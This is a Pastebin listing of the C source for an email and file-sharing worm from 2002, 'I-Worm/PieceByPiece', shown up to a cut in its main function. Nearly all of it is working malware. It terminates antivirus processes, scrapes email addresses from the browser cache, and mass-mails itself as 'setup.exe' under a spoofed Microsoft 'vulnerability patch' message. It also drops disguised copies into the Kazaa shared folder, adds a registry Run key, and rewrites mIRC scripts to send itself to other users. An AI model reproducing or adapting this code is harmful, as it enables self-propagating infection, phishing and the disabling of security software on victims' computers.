FlyFar

I-Worm.PieceByPiece - Source Code

Jul 13th, 2023
120
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 23.72 KB | Cybersecurity | 0 0
  1. /*
  2. I-Worm/PieceByPiece Copyright (C) 2002 MI_pirat [Red-Cell] inc.
  3. For educational purpose only. Distribute under GPL.
  4. Some lyrics from the song that inspired me:
  5.  
  6.     "Cause nothing ever lasts forever
  7.     We're like flowers in this vase, together
  8.     You and me, it's pulling me down
  9.     Tearing my down, piece by piece
  10.     And you can't see
  11.     That's it's like a disease
  12.     Killing me now, it's so hard to breathe"
  13.                     -Feeder <Piece by Piece>
  14. */
  15.  
  16. #include <winsock.h>
  17. #include <fstream.h>
  18. #include <tlhelp32.h>
  19. #include <string.h>
  20. #include <stdlib.h>
  21.  
  22. //--------------------------------------GLOBAL VARIABLES-------------------------------------
  23.  
  24. HWND hwnd;
  25. WORD version = MAKEWORD(1,1);
  26. WSADATA wsaData;
  27. int nRet;
  28. char Buf[256],myBuf[256],ch[1],ch2[256],server[]="smtp.barrysworld.com",email[]="john@barrysworld.com",helo[]="barrysworld.com";
  29. char emails[50][100],windir[MAX_PATH],filename[MAX_PATH],winbkup[MAX_PATH],zippth[MAX_PATH];
  30. char cx[1],cx2[33],buc1[8],buc2[8],buc3[8],xxx[256];
  31. SOCKET theSocket;
  32. int i,err=0,c=0,connected=0,tim,sending=0;
  33. SYSTEMTIME time;
  34. double k;
  35. DWORD basesize,ProcessId;
  36.  
  37. //--------------------------------------WNDPROC-----------------------------------------------
  38.  
  39. LRESULT CALLBACK WndProc(HWND hWnd,UINT iMsg,WPARAM wParam,LPARAM lParam);
  40.  
  41. //--------------------------------------GETASC------------------------------------------------
  42.  
  43. int getasc(char chr[1]) {
  44. int i=0;
  45. char c[1];
  46.  
  47. for (i=0;i<257;i++) {
  48. c[0]=i;
  49. if (chr[0]==c[0]) { return(i); }
  50. }
  51. }
  52.  
  53. //--------------------------------------BASE64-----------------------------------------------
  54.  
  55. void base64(char *file) { //Encodes a file using the "base 64" encoding
  56. WIN32_FIND_DATA fis;     //It's kinna shitty code, but it works just GREAT!
  57. int i,j,n,done=0,k=0,lin=0;
  58. double c=0;
  59. char tmp[7];
  60. DWORD totsize;
  61. char base[64]={'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P',
  62.    
  63.     'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f',
  64.    
  65.     'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v',
  66.    
  67.     'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/'};
  68.  
  69. fstream f(file,ios::in | ios::binary), g("C:\\Msbootlog.sys",ios::out);
  70. FindFirstFile(file,&fis);
  71. totsize=fis.nFileSizeLow;    //Get the file size in bytes
  72. for (c=0;c<totsize/3;c++) { //Encode 'till no more 3 char chunks are available
  73.  
  74. buc1[0]=0;
  75. xxx[0]=0;
  76. f.get(cx[1]);
  77. j=getasc(&cx[1]);
  78. itoa(j,cx2,2);
  79. if (strlen(cx2)<8) {
  80. for (i=0;i<8-strlen(cx2);i++) buc1[i]='0';
  81. buc1[i]=0;
  82. strcat(buc1,cx2);
  83. } else strcpy(buc1,cx2);
  84. buc2[0]=0;
  85. f.get(cx[1]);
  86. j=getasc(&cx[1]);
  87. itoa(j,cx2,2);
  88. if (strlen(cx2)<8) {
  89. for (i=0;i<8-strlen(cx2);i++) buc2[i]='0';
  90. buc2[i]=0;
  91. strcat(buc2,cx2);
  92. } else strcpy(buc2,cx2);
  93. buc3[0]=0;
  94. f.get(cx[1]);
  95. j=getasc(&cx[1]);
  96. itoa(j,cx2,2);
  97. if (strlen(cx2)<8) {
  98. for (i=0;i<8-strlen(cx2);i++) buc3[i]='0';
  99. buc3[i]=0;
  100. strcat(buc3,cx2);
  101. } else strcpy(buc3,cx2);
  102. xxx[0]=0;
  103. strcpy(xxx,buc1);
  104. done=0;
  105. k=0;
  106. while (done!=24) {
  107.     for (i=done;i<done+6;i++) {
  108.     tmp[k]=xxx[i];
  109.     k++;
  110.     }
  111. tmp[k]=0;
  112. done+=6;
  113. n=strtol(tmp,NULL,2);
  114. g<<base[n];
  115. lin++;
  116. if (lin==76) {
  117.     g<<endl;lin=0;
  118. }
  119. tmp[0]=0;
  120. k=0;
  121. }
  122.  
  123. }
  124.  
  125. //One char left so add 4 0s at the end
  126. if (totsize%3==1) {
  127. buc1[0]=0;
  128. f.get(cx[1]);
  129. j=getasc(&cx[1]);
  130. itoa(j,cx2,2);
  131. if (strlen(cx2)<8) {
  132. for (i=0;i<8-strlen(cx2);i++) buc1[i]='0';
  133. buc1[i]=0;
  134. strcat(buc1,cx2);
  135. } else strcpy(buc1,cx2);
  136. strcat(buc1,"0000");
  137. done=0;
  138. k=0;
  139. while (done!=12) {
  140.     for (i=done;i<done+6;i++) {
  141.     tmp[k]=buc1[i];
  142.     k++;
  143.     }
  144. tmp[k]=0;
  145. done+=6;
  146. n=strtol(tmp,NULL,2);
  147. g<<base[n];
  148. lin++;
  149. if (lin==76) {
  150.     g<<endl;lin=0;
  151. }
  152. tmp[0]=0;
  153. k=0;
  154. }
  155. g<<"==";
  156. }
  157.  
  158. //Two chars left so add 2 0s at the end
  159. if (totsize%3==2) {
  160. buc1[0]=0;
  161. f.get(cx[1]);
  162. j=getasc(&cx[1]);
  163. itoa(j,cx2,2);
  164. if (strlen(cx2)<8) {
  165. for (i=0;i<8-strlen(cx2);i++) buc1[i]='0';
  166. buc1[i]=0;
  167. strcat(buc1,cx2);
  168. } else strcpy(buc1,cx2);
  169. strcat(buc1,"00");
  170. done=0;
  171. k=0;
  172. while (done!=18) {
  173.     for (i=done;i<done+6;i++) {
  174.     tmp[k]=buc1[i];
  175.     k++;
  176.     }
  177. tmp[k]=0;
  178. done+=6;
  179. n=strtol(tmp,NULL,2);
  180. g<<base[n];
  181. lin++;
  182. if (lin==76) {
  183.     g<<endl;lin=0;
  184. }
  185. tmp[0]=0;
  186. k=0;
  187. }
  188. g<<"=";
  189. }
  190.  
  191. f.close();
  192. g.close();
  193. //Get the size of the encoded file
  194. FindFirstFile("C:\\Msbootlog.sys",&fis);
  195. basesize=fis.nFileSizeLow;
  196. }
  197. //--------------------------------------SENDMAIL---------------------------------------------
  198.  
  199. void sendmail() { //Sends an e-mail with MIME encoding
  200. int ran;
  201.  
  202. sending=1;
  203. //"HELO" the server
  204. strcpy(myBuf, "HELO <");
  205. strcat(myBuf,helo);
  206. strcat(myBuf,">\x0d\x0a");
  207. send(theSocket,myBuf,strlen(myBuf),0);
  208.  
  209. recv(theSocket,Buf,sizeof(Buf),0);
  210.  
  211. if (Buf[0]=='2' && Buf[1]=='5' && Buf[2]=='0') {
  212. strcpy(myBuf, "MAIL FROM:<");
  213. strcat(myBuf,email);
  214. strcat(myBuf,">\x0d\x0a");
  215. send(theSocket,myBuf,strlen(myBuf),0);
  216.  
  217. recv(theSocket,Buf,sizeof(Buf),0);
  218. }
  219. if (Buf[0]=='4' || Buf[0]=='5') err=1;
  220.  
  221. if (Buf[0]=='2' && Buf[1]=='5' && Buf[2]=='0' && err==0) {
  222.  
  223. GetSystemTime(&time);
  224. srand(time.wSecond);
  225. ran=rand();
  226. while (ran>c) {
  227. srand(c);
  228. ran=ran-rand();
  229. }
  230. if (ran<0) ran=ran*(-1);
  231. strcpy(myBuf, "RCPT TO:<");
  232. strcat(myBuf, emails[ran]);
  233. strcat(myBuf, ">\x0d\x0a");
  234. send(theSocket,myBuf,strlen(myBuf),0);
  235.  
  236. recv(theSocket,Buf,sizeof(Buf),0);
  237. }
  238. if (Buf[0]=='4' || Buf[0]=='5') err=1;
  239.  
  240. if (Buf[0]=='2' && Buf[1]=='5' && err==0) {
  241. strcpy(myBuf, "DATA\x0d\x0a");
  242. send(theSocket,myBuf,strlen(myBuf),0);
  243.  
  244. recv(theSocket,Buf,sizeof(Buf),0);
  245. }
  246. if (Buf[0]=='4' || Buf[0]=='5') err=1;
  247.  
  248. if (Buf[0]=='3' && Buf[1]=='5' && Buf[2]=='4' && err==0) {
  249.  
  250. if (stricmp(email,"john@barrysworld.com")==0) { //if we use the hard-coded e-mail address
  251.     strcpy(myBuf, "Reply-To: \"Microsoft\" <microsoft@microsoft.com>\x0d\x0a");
  252.     send(theSocket,myBuf,strlen(myBuf),0);
  253.  
  254.     strcpy(myBuf, "From: \"Microsoft\" <information@microsoft.com>\x0d\x0a");
  255.     send(theSocket,myBuf,strlen(myBuf),0);
  256.  
  257.     strcpy(myBuf, "Subject: Internet Explorer vulnerability patch\x0d\x0a");
  258.     send(theSocket,myBuf,strlen(myBuf),0);
  259. } else { //if we find a new address
  260.     strcpy(myBuf, "From: <");
  261.     strcat(myBuf, email);
  262.     strcat(myBuf, ">\x0d\x0a");
  263.     send(theSocket,myBuf,strlen(myBuf),0);
  264.  
  265.     strcpy(myBuf, "Subject: Hello\x0d\x0a");
  266.     send(theSocket,myBuf,strlen(myBuf),0);
  267.  
  268. }
  269.  
  270. strcpy(myBuf, "MIME-Version: 1.0\x0d\x0a");
  271. send(theSocket,myBuf,strlen(myBuf),0);
  272.  
  273. strcpy(myBuf, "Content-Type: multipart/mixed;\x0d\x0a");
  274. send(theSocket,myBuf,strlen(myBuf),0);
  275.  
  276. strcpy(myBuf, "    boundary = \"bla\"\x0d\x0a");
  277. send(theSocket,myBuf,strlen(myBuf),0);
  278.  
  279. strcpy(myBuf, "X-Priority: 3\x0d\x0a");
  280. send(theSocket,myBuf,strlen(myBuf),0);
  281.  
  282. strcpy(myBuf, "X -MSMail - Priority: Normal\x0d\x0a");
  283. send(theSocket,myBuf,strlen(myBuf),0);
  284.  
  285. strcpy(myBuf, "X-Mailer: mailer@localhost\x0d\x0a\x0d\x0a");
  286. send(theSocket,myBuf,strlen(myBuf),0);
  287.  
  288. strcpy(myBuf, "This is a multi-part message in MIME format.\x0d\x0a\x0d\x0a");
  289. send(theSocket,myBuf,strlen(myBuf),0);
  290.  
  291. strcpy(myBuf, "--bla\x0d\x0a");
  292. send(theSocket,myBuf,strlen(myBuf),0);
  293.  
  294. strcpy(myBuf, "Content-Type: text/plain; charset:us-ascii\x0d\x0a\x0d\x0a");
  295. send(theSocket,myBuf,strlen(myBuf),0);
  296.  
  297. strcpy(myBuf, "You will find all you need in the attachment.\x0d\x0a\x0d\x0a");
  298. send(theSocket,myBuf,strlen(myBuf),0);
  299.  
  300. strcpy(myBuf, "--bla\x0d\x0a");
  301. send(theSocket,myBuf,strlen(myBuf),0);
  302.  
  303. strcpy(myBuf, "Content-Type: application/x-msdownload;\x0d\x0a");
  304. send(theSocket,myBuf,strlen(myBuf),0);
  305.  
  306. strcpy(myBuf, "    name = \"setup.exe\"\x0d\x0a");
  307. send(theSocket,myBuf,strlen(myBuf),0);
  308.  
  309. strcpy(myBuf, "Content-Transfer-Encoding: base64\x0d\x0a");
  310. send(theSocket,myBuf,strlen(myBuf),0);
  311.  
  312. strcpy(myBuf, "Content-Disposition: attachment;\x0d\x0a");
  313. send(theSocket,myBuf,strlen(myBuf),0);
  314.  
  315. strcpy(myBuf, "    filename = \"setup.exe\"\x0d\x0a\x0d\x0a");
  316. send(theSocket,myBuf,strlen(myBuf),0);
  317.  
  318. //Send the file byte by byte
  319. fstream f("C:\\Msbootlog.sys",ios::in);
  320. for (k=0;k<basesize;k++) {
  321. f.get(ch[1]);
  322. strcpy(myBuf,&ch[1]);
  323. send(theSocket,myBuf,strlen(myBuf),0);
  324. }
  325. f.close();
  326.  
  327. strcpy(myBuf, "\x0d\x0a--bla--\x0d\x0a");
  328. send(theSocket,myBuf,strlen(myBuf),0);
  329.  
  330. strcpy(myBuf, "\x0d\x0a.\x0d\x0a");
  331. send(theSocket,myBuf,strlen(myBuf),0);
  332.  
  333. recv(theSocket,Buf,sizeof(Buf),0);
  334. }
  335. if (Buf[0]=='4' || Buf[0]=='5') err=1;
  336.  
  337. strcpy(myBuf, "QUIT\x0d\x0a");
  338. send(theSocket,myBuf,strlen(myBuf),0);
  339. }
  340.  
  341. //--------------------------------------GETPROCESSMODULE------------------------------------
  342.  
  343. BOOL GetProcessModule (DWORD dwPID, DWORD dwModuleID,
  344.      LPMODULEENTRY32 lpMe32, DWORD cbMe32)
  345. {
  346.     BOOL          bRet        = FALSE;
  347.     BOOL          bFound      = FALSE;
  348.     HANDLE        hModuleSnap = NULL;
  349.     MODULEENTRY32 me32        = {0};
  350.  
  351.     hModuleSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwPID);
  352.     if (hModuleSnap == (HANDLE)-1)
  353.         return (FALSE);
  354.  
  355.     me32.dwSize = sizeof(MODULEENTRY32);
  356.  
  357.    if (Module32First(hModuleSnap, &me32))
  358.     {
  359.         do
  360.         {
  361.             if (me32.th32ModuleID == dwModuleID)
  362.             {
  363.                 CopyMemory (lpMe32, &me32, cbMe32);
  364.                 bFound = TRUE;
  365.             }
  366.         }
  367.         while (!bFound && Module32Next(hModuleSnap, &me32));
  368.  
  369.         bRet = bFound;  
  370.     }
  371.     else
  372.         bRet = FALSE;
  373.     CloseHandle (hModuleSnap);
  374.  
  375.     return (bRet);
  376. }
  377.  
  378. //--------------------------------------PROCESSES---------------------------------------------
  379.  
  380. BOOL processes() //Various stuff with processes
  381. {
  382.     HANDLE         hProcessSnap = NULL;
  383.     BOOL           bRet      = FALSE;
  384.     PROCESSENTRY32 pe32      = {0};
  385.    
  386.     hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
  387.     if (hProcessSnap == (HANDLE)-1)
  388.         return (FALSE);
  389.     pe32.dwSize = sizeof(PROCESSENTRY32);
  390.     if (Process32First(hProcessSnap, &pe32))
  391.     {
  392.         DWORD         dwPriorityClass;
  393.         BOOL          bGotModule = FALSE;
  394.         MODULEENTRY32 me32       = {0};
  395.         do
  396.         {
  397.             bGotModule = GetProcessModule(pe32.th32ProcessID,
  398.                 pe32.th32ModuleID, &me32, sizeof(MODULEENTRY32));
  399.             if (bGotModule)
  400.             {
  401.                 HANDLE hProcess;
  402.                 hProcess = OpenProcess (PROCESS_ALL_ACCESS,
  403.                     FALSE, pe32.th32ProcessID);
  404.                 dwPriorityClass = GetPriorityClass (hProcess);
  405.                 //Get the virus' filename
  406.                 if (me32.th32ProcessID==ProcessId) strcpy(filename,me32.szExePath);
  407.                                                
  408.                 //Anti AVs
  409.                 if (strstr(me32.szModule,"AV")!=0 || strstr(me32.szModule,"F-")!=0 || strstr(me32.szModule,"av")!=0) {
  410.                     TerminateProcess(hProcess,0);
  411.                     }
  412.                
  413.                 //Close the handle
  414.                 CloseHandle (hProcess);
  415.             }
  416.         }
  417.         while (Process32Next(hProcessSnap, &pe32));
  418.         bRet = TRUE;
  419.     }
  420.     else
  421.         bRet = FALSE;
  422.     CloseHandle (hProcessSnap);
  423.     return (bRet);
  424. }
  425.  
  426. //--------------------------------------FINDSERVER--------------------------------------------
  427.  
  428. void findserver() { //Gets a SMTP server and user name from the registry (if possible)
  429. int i,j;
  430. char key2[256];
  431. unsigned char acc[1024],smtp[1024],eml[1024];
  432. DWORD acclen=sizeof(acc), smtplen=sizeof(smtp), emllen=sizeof(eml);
  433. HKEY hKey;
  434.  
  435. //Try getting a SMTP server from registry
  436. strcpy(key2,"Software\\Microsoft\\Internet Account Manager");
  437. RegOpenKeyEx(HKEY_CURRENT_USER,key2,0,KEY_QUERY_VALUE,&hKey);
  438. RegQueryValueEx(hKey,"Default Mail Account",0,NULL,acc,&acclen);
  439. RegCloseKey(hKey);
  440. strcpy(key2,"Software\\Microsoft\\Internet Account Manager\\Accounts\\");
  441. j=strlen(key2);
  442. for (i=0;i<8;i++){
  443. key2[j+i]=acc[i];
  444. }
  445. key2[j+i]=0;
  446. RegOpenKeyEx(HKEY_CURRENT_USER,key2,0,KEY_QUERY_VALUE,&hKey);
  447. RegQueryValueEx(hKey,"SMTP Server",0,NULL,smtp,&smtplen);
  448. RegCloseKey(hKey);
  449. if (smtp[0]>44 && smtp[0]<123) { //if a valid serv. is found, replace the hard-coded one with
  450. i=0;                            //the new one
  451. while (smtp[i]!=0) {
  452.     server[i]=smtp[i]; //Now this is the SMTP server
  453.     i++;   
  454.     }
  455. server[i]=0;
  456. //Get the e-mail
  457. RegOpenKeyEx(HKEY_CURRENT_USER,key2,0,KEY_QUERY_VALUE,&hKey);
  458. RegQueryValueEx(hKey,"SMTP Email Address",0,NULL,eml,&emllen);
  459. RegCloseKey(hKey);
  460. if (eml[0]>44 && eml[0]<123) { //if a valid e-mail is found, replace the hard-coded one with
  461. i=0;                          //the new one
  462. while (eml[i]!=0) {
  463.     email[i]=eml[i]; //Now this is the "FROM:" e-mail
  464.     i++;
  465.     }
  466. email[i]=0;
  467. }
  468. //Set a new "HELO" domain
  469. i=strlen(email)-1;
  470. j=0;
  471. while (email[i]!='@') {
  472.     helo[j]=email[i];
  473.     j++;
  474.     i--;
  475.     }
  476. }
  477. helo[j]=0;
  478. strrev(helo);
  479. //end
  480. }
  481.  
  482. //--------------------------------------FINDMAIL----------------------------------------------
  483.  
  484. void findmail(char file[MAX_PATH]) //Gets e-mail addresses from HTML files
  485. {
  486. int ik,j=0;
  487. char lin[256],*start,ch[1];
  488.  
  489. fstream f(file,ios::in);
  490. while (f.get(lin,256))
  491. {
  492. start=strstr(lin,"mailto:");
  493. if (start!=0)
  494.  {
  495.  j=0;
  496.  c++;
  497.  ik=start-lin+7;
  498.  ch[1]=lin[ik];
  499.  while (ch[1]!=34 && ch[1]!=58 && ch[1]!=32 && ch[1]!=62 && ch[1]!=63)
  500.   {
  501.   emails[c][j]=ch[1];
  502.   j++;
  503.   ik++;
  504.   ch[1]=lin[ik];
  505.   }
  506. emails[c][j]=0;
  507. }
  508. f.get();
  509. }
  510. f.close();
  511. }
  512.  
  513. //--------------------------------------FINDFILES---------------------------------------------
  514.  
  515. void findfiles() { //Searches for .htm files in the temp. directories
  516. WIN32_FIND_DATA f;
  517. HANDLE hf;
  518. int k=0;
  519. char pth1[MAX_PATH],pth2[MAX_PATH],pth3[MAX_PATH],pth[MAX_PATH],path[MAX_PATH];
  520.  
  521. strcpy(pth2,windir);
  522. strcat(pth2,"\\Temporary Internet Files\\*");
  523. hf=FindFirstFile(pth2,&f);
  524. if (f.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY+FILE_ATTRIBUTE_SYSTEM) {strcpy(pth1,f.cFileName); k=20;}
  525. while (FindNextFile(hf,&f)!=0 && k<20) {
  526.     if (f.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY+FILE_ATTRIBUTE_SYSTEM) {strcpy(pth1,f.cFileName); k=20;}
  527.     k++;
  528. }
  529. FindClose(hf);
  530. strcpy(pth2,windir);
  531. strcat(pth2,"\\Temporary Internet Files\\");
  532. strcat(pth2,pth1);
  533. strcat(pth2,"\\*");
  534. k=0;
  535. hf=FindFirstFile(pth2,&f);
  536. if (f.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY+FILE_ATTRIBUTE_SYSTEM) {strcpy(pth3,f.cFileName); k=20;}
  537. while (FindNextFile(hf,&f)!=0 && k<20) {
  538.     if (f.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY+FILE_ATTRIBUTE_SYSTEM) {strcpy(pth3,f.cFileName); k=20;}
  539.     k++;
  540. }
  541. FindClose(hf);
  542. strcpy(pth2,windir);
  543. strcat(pth2,"\\Temporary Internet Files\\");
  544. strcat(pth2,pth1);
  545. strcat(pth2,"\\");
  546. strcat(pth2,pth3);
  547. strcpy(pth,pth2);
  548. strcat(pth,"\\");
  549. strcat(pth2,"\\*.htm");
  550. k=0;
  551. hf=FindFirstFile(pth2,&f);
  552. while (FindNextFile(hf,&f)!=0 && k<70) {
  553.     if (f.cFileName[0]!='.') {
  554.         strcpy(path,pth);
  555.         strcat(path,f.cFileName);
  556.         findmail(path);
  557.     }
  558.     k++;
  559. }
  560. FindClose(hf);
  561. }
  562.  
  563. //--------------------------------------CONECT------------------------------------------------
  564.  
  565. int conect() { //Connects to a server using "Winsock"
  566.  
  567. // Start up Winsock
  568. i=WSAStartup(version, &wsaData);
  569. if (i!=0) {return(0);}
  570.  
  571. // Store information about the server
  572. LPHOSTENT lpHostEntry;
  573.  
  574. lpHostEntry = gethostbyname(server);
  575. if (lpHostEntry == NULL) {
  576. WSACleanup();
  577. connected=0;
  578. return(0);
  579. } else connected=1; //This means we're connected
  580. //Get important data
  581. if (err==0) { //If we didn't run this allready and got an error
  582.     findserver();
  583.     findfiles();
  584. }
  585. // Create the socket
  586. theSocket = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);   
  587. if (theSocket == INVALID_SOCKET) {
  588. WSACleanup();
  589. connected=0;
  590. return(0);
  591. }
  592.  
  593. SOCKADDR_IN saServer;
  594. saServer.sin_family = AF_INET;
  595. saServer.sin_addr = *((LPIN_ADDR)*lpHostEntry->h_addr_list);
  596. saServer.sin_port = htons(25);
  597. // Connect to the server
  598. nRet = connect(theSocket,(LPSOCKADDR)&saServer,sizeof(struct sockaddr));   
  599. if (nRet == SOCKET_ERROR) {
  600. WSACleanup();
  601. connected=0;
  602. return(0);
  603. }
  604.  
  605. nRet = recv(theSocket,Buf,sizeof(Buf),0);          
  606. if (nRet == SOCKET_ERROR) {
  607. WSACleanup();
  608. connected=0;
  609. return(0);
  610. }
  611.  
  612. if (Buf[0]=='4' || Buf[0]=='5') err=1;
  613. if (Buf[0]=='2' && Buf[1]=='2' && Buf[2]=='0') {
  614. sendmail();
  615. }
  616. //Close the connection
  617. closesocket(theSocket);
  618. // Shutdown Winsock
  619. WSACleanup();
  620. }
  621.  
  622. //--------------------------------------KAZAA-----------------------------------------------
  623.  
  624. void kazaa(char *file) { //Makes a copy in the Kazaa "Shared Folder"
  625. int i;
  626. char kaza[256],kfile[3][20];
  627. unsigned char kpth[1024];
  628. DWORD kpthlen=sizeof(kpth);
  629. HKEY hKey;
  630.  
  631. //The filenames
  632. strcpy(kfile[0],"\\mirc6.exe");
  633. strcpy(kfile[1],"\\winamp3.exe");
  634. strcpy(kfile[2],"\\wincrack.exe");
  635. strcpy(kfile[3],"\\icq2002.exe");
  636. //Get the path to Kazaa from the reg.
  637. RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Kazaa\\Transfer",0,KEY_QUERY_VALUE,&hKey);
  638. RegQueryValueEx(hKey,"DlDir0",0,NULL,kpth,&kpthlen);
  639. RegCloseKey(hKey);
  640. if (kpth[0]>64 && kpth[0]<123) {
  641. i=0;                       
  642. while (kpth[i]!=0) {
  643.     kaza[i]=kpth[i];
  644.     i++;
  645.     }
  646. kaza[i]=0;
  647. }
  648. GetSystemTime(&time);
  649. srand(time.wSecond);
  650. if (rand()%5==0) strcat(kaza,kfile[3]);
  651.  else if (rand()%4==0) strcat(kaza,kfile[2]);
  652.   else if (rand()%3==0) strcat(kaza,kfile[1]);
  653.    else if (rand()%2==0) strcat(kaza,kfile[0]);
  654. CopyFile(file,kaza,FALSE);
  655. }
  656.  
  657. //--------------------------------------INFECTWIN-------------------------------------------
  658.  
  659. void infectwin(char *file) { //Makes copies of the worm in %WinDir%\System\winsys*.exe
  660. HKEY hKey;
  661. unsigned char val[256];
  662. char rnd[6];
  663. int i=0;
  664.  
  665. strcpy(winbkup,windir);
  666. strcat(winbkup,"\\System\\winsys");
  667. GetSystemTime(&time);
  668. srand(time.wSecond);
  669. itoa(rand(),rnd,10);
  670. strcat(winbkup,rnd);
  671. strcat(winbkup,".exe");
  672. //Copy file to Windows
  673. CopyFile(file,winbkup,TRUE);
  674. //Just in case there is no WinZip, use this path
  675. strcpy(zippth,winbkup);
  676. //Now make Windows run it at startup
  677. while (winbkup[i]!=0) {
  678.     val[i]=winbkup[i];
  679.     i++;
  680.     }
  681. val[i]=0;
  682. RegCreateKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&hKey);
  683. RegSetValueEx(hKey,"Windows task32 sys",0,REG_SZ,val,sizeof(val));
  684. RegCloseKey(hKey);
  685. }
  686.  
  687. //--------------------------------------MIRC--------------------------------------------------
  688.  
  689. void mirc() { //Creates a mIRC script
  690. HKEY hKey;
  691. unsigned char mircpth[1024];
  692. char mirc[MAX_PATH];
  693. int i=0;
  694. DWORD mircpthlen=sizeof(mircpth);
  695.  
  696. //Get the path from our friend: the registry :)
  697. RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\mIRC",0,KEY_QUERY_VALUE,&hKey);
  698. RegQueryValueEx(hKey,"UninstallString",0,NULL,mircpth,&mircpthlen);
  699. RegCloseKey(hKey);
  700. i=1;
  701. while (mircpth[i]!=0 && mircpth[i]!='.') {
  702.     mirc[i-1]=mircpth[i];
  703.     i++;
  704.     }
  705. mirc[i-1]=0;
  706. i=strlen(mirc);
  707. while (mirc[i]!=92) {
  708.     mirc[i]=0;
  709.     i--;
  710.     }
  711. strcat(mirc,"script.ini");
  712. //Write a new script.ini
  713. fstream f(mirc,ios::out);
  714. f<<"[Script]"<<endl;
  715. f<<"n0=ON 1:JOIN:#:{"<<endl;
  716. f<<"n1=/dcc send $nick "<<zippth<<endl;
  717. f<<"n2=}"<<endl;
  718. f<<"n3=on 1:start:{"<<endl;
  719. f<<"n4= /join #piecebypiece"<<endl;
  720. f<<"n5=}"<<endl;
  721. f.close();
  722.  
  723. }
  724.  
  725. //--------------------------------------ZIPIT-------------------------------------------------
  726.  
  727. void zipit(char *file) { //Zips the virus with a random name
  728. HKEY hKey;
  729. unsigned char zip[1024];
  730. char zippath[MAX_PATH],param[MAX_PATH],rnd[6];
  731. int i=0;
  732. DWORD ziplen=sizeof(zip);
  733.  
  734. //Get the path from the registry
  735. i=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\winzip32.exe",0,KEY_QUERY_VALUE,&hKey);
  736. if (i==ERROR_SUCCESS) { //If WinZip is installed then zip the file
  737. RegQueryValueEx(hKey,"",0,NULL,zip,&ziplen);
  738. RegCloseKey(hKey);
  739. i=0;
  740. while (zip[i]!=0) {
  741.     zippath[i]=zip[i];
  742.     i++;
  743.     }
  744. zippath[i]=0;
  745. //Make a random filename for the .zip file
  746. strcpy(zippth,windir);
  747. strcat(zippth,"\\System\\win32sys");
  748. GetSystemTime(&time);
  749. srand(time.wSecond);
  750. itoa(rand(),rnd,10);
  751. strcat(zippth,rnd);
  752. strcat(zippth,".zip");
  753. //Zip it!
  754. strcpy(param," -a -r ");
  755. strcat(param,zippth);
  756. strcat(param," ");
  757. strcat(param,file);
  758. ShellExecute(hwnd,"open",zippath,param,NULL,SW_HIDE);
  759. } else strcpy(zippth,file); //Else just use the executable file for mIRC
  760.  
  761. }
  762.  
  763. //--------------------------------------TIMERPROC---------------------------------------------
  764.  
  765. VOID CALLBACK TimerProc(HWND hwnd,UINT uMsg,UINT idEvent,DWORD dwTime) {
  766.    
  767. if (sending==0) { //Check for a connection if a mail is not under delivery
  768.     conect();
  769.     if (err!=0) { //if the server used encountered an error, try using the hard-coded serv.
  770.         strcpy(server,"smtp.barrysworld.com");
  771.         strcpy(email,"john@barrysworld.com");
  772.         strcpy(helo,"barrysworld.com");
  773.         conect();
  774.         }
  775.     if (connected==1) KillTimer(hwnd,tim); //Don't need to check for it again, but keep resident
  776.     }
  777. }
  778.  
  779. //--------------------------------------PAYLOAD-----------------------------------------------
  780. void payload() { //Every virus MUST have a payload ;)
  781. MessageBox(NULL,"\"Cause nothing ever lasts forever\nWe're like flowers in this vase, together\nYou and me, it's pulling me down\nTearing my down, piece by piece\nAnd you can't see\nThat's it's like a disease\nKilling me now, it's so hard to breathe\"\n\t-Feeder <Piece by Piece>","I-Worm/PiecebyPiece",MB_OK+MB_SYSTEMMODAL);
  782. }
  783.  
  784. //--------------------------------------------------------------------------------------------
  785. //Main function
  786. //--------------------------------------------------------------------------------------------
  787.  
  788. int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInst,LPSTR lpCmdLine,int nShowCmd){
  789. WNDCLASSEX wndc;
  790. MSG msg;    
  791. HKEY hKey;
  792. unsigned char buf[1024],inf[]="yes";
  793. DWORD buflen=sizeof(buf);
  794. int first=0;
  795.  
  796. //Create a window
  797. wndc.cbClsExtra = 0;
  798. wndc.cbSize = sizeof(wndc);
  799. wndc.cbWndExtra = 0;
  800. wndc.hbrBackground = (HBRUSH)GetStockObject(BLACK_BRUSH);
  801. wndc.hCursor = LoadCursor(NULL,IDC_ARROW);
  802. wndc.hIcon = LoadIcon(NULL,IDI_APPLICATION);
  803. wndc.hIconSm = LoadIcon(NULL,IDI_APPLICATION);
  804. wndc.hInstance = hInstance;
  805. wndc.lpfnWndProc = WndProc;
  806. wndc.lpszClassName = "ClassName";
  807. wndc.lpszMenuName = NULL;
  808. wndc.style = CS_HREDRAW|CS_VREDRAW;
  809. RegisterClassEx(&wndc);
  810. hwnd =CreateWindow("ClassName","NEWWIN",WS_POPUPWINDOW,0,0,1024,1024,NULL,NULL,hInstance,NULL);
  811. UpdateWindow(hwnd);
  812. //Hide the window
  813. ShowWindow(hwnd,SW_HIDE);
  814. //Get the filename and disable (if possible) any AVs
  815. GetWindowThreadProcessId(hwnd,&ProcessId);
  816. processes();
  817. GetWindowsDirectory (windir, sizeof (windir)); //Get the Windir
  818. //Check if the comp. was infected before
  819. RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\RedCell",0,KEY_QUERY_VALUE,&hKey);
  820. RegQueryValueEx(hKey,"infected",0,NULL,buf,&buflen);
  821. RegCloseKey(hKey);
  822. if (buf[0]!='y' || buf[1]!='e' || buf[2]!='s')
